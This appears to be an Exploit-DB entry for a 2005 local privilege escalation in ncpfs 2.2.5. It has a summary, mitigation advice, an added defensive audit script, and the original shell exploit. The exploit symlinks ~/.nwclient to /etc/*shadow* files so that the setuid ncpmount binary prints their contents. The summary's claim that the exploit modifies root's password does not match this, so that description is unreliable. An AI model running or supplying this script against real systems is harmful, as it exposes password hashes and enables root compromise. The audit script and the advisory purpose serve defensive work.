by: super
CVSS: 7.5 (HIGH)
Local Privilege Escalation
Affected Version From: ncpfs 2.2.5
Patch Exists: NO
2005

Local Privilege Escalation

This exploit allows a local attacker to escalate their privileges on a system by modifying root's encrypted password. The exploit is specific to ncpfs 2.2.5 on Gentoo. It requires the attacker to already have access to the system and to execute the provided script. The script creates a temporary directory, replaces the ~/.nwclient file, mounts the directory using ncpmount, and then removes the temporary directory and restores the ~/.nwclient file. If successful, the attacker will have root privileges. For more details, refer to milw0rm.com.

Mitigation:

Upgrade to a patched version of ncpfs. Remove any unnecessary setuid/setgid binaries. Limit access to sensitive files and directories.
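The following audit script is an added example (not part of the Exploit-DB entry or of ncpfs itself) that checks a host for the two conditions the script below depends on: a setuid ncpmount binary and a ~/.nwclient that is a symbolic link, which ncpmount would follow. The ncpmount path and the list of home directories are passed as arguments, so every path is an assumption.

```shell
#!/bin/sh
# Added audit example: not part of the Exploit-DB entry or of ncpfs itself.
# It reports (1) a setuid ncpmount binary and (2) any ~/.nwclient that is a
# symlink, the two conditions the exploit relies on. The binary path and home
# directories are passed in by the caller, so all paths here are assumptions.

# is_setuid FILE : succeeds when FILE carries the setuid bit
is_setuid() {
    [ -u "$1" ]
}

# nwclient_is_symlink FILE : succeeds when FILE is a symbolic link
nwclient_is_symlink() {
    [ -L "$1" ]
}

# audit_ncpfs NCPMOUNT HOME... : prints one FINDING line per problem and
# returns the number of findings (0 means nothing to report)
audit_ncpfs() {
    bin="$1"
    shift
    findings=0
    if [ -e "$bin" ] && is_setuid "$bin"; then
        # The page's mitigation: drop unnecessary setuid bits.
        echo "FINDING: $bin is setuid; remove the bit with: chmod u-s $bin"
        findings=$((findings + 1))
    fi
    for home in "$@"; do
        cfg="$home/.nwclient"
        if nwclient_is_symlink "$cfg"; then
            echo "FINDING: $cfg is a symlink to $(readlink "$cfg")"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}
```

Run it as root over the real home directories, e.g. `audit_ncpfs /usr/bin/ncpmount /home/*` (the binary location is an assumption; check it with `command -v ncpmount`).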

Exploit-DB raw data:

#!/bin/sh
## Had to remove local -r to get it to work via sh on my box
## Root's encrypted password was in toupper form but the
## super stated it worked fine for him (Gentoo with ncpfs 2.2.5)
## If it worked for you send an email to info@milw0rm.com /str0ke

(echo  'head1 by super'
 echo -e '==============\n'
 (function head1(){
   (local -r MNTDIR=~/mnt.$$
     (mv ~/.nwclient ~/.nwclient.temp
       ln -sf $1 ~/.nwclient
       mkdir $MNTDIR)2>/dev/null
     (echo $1
       ncpmount $MNTDIR
       echo)
     (rmdir $MNTDIR
       rm ~/.nwclient
       mv .nwclient.temp .nwclient)2>/dev/null)}
 (for i in /etc/*shadow*
   do head1 $i
   done)))#

# milw0rm.com [2005-01-30]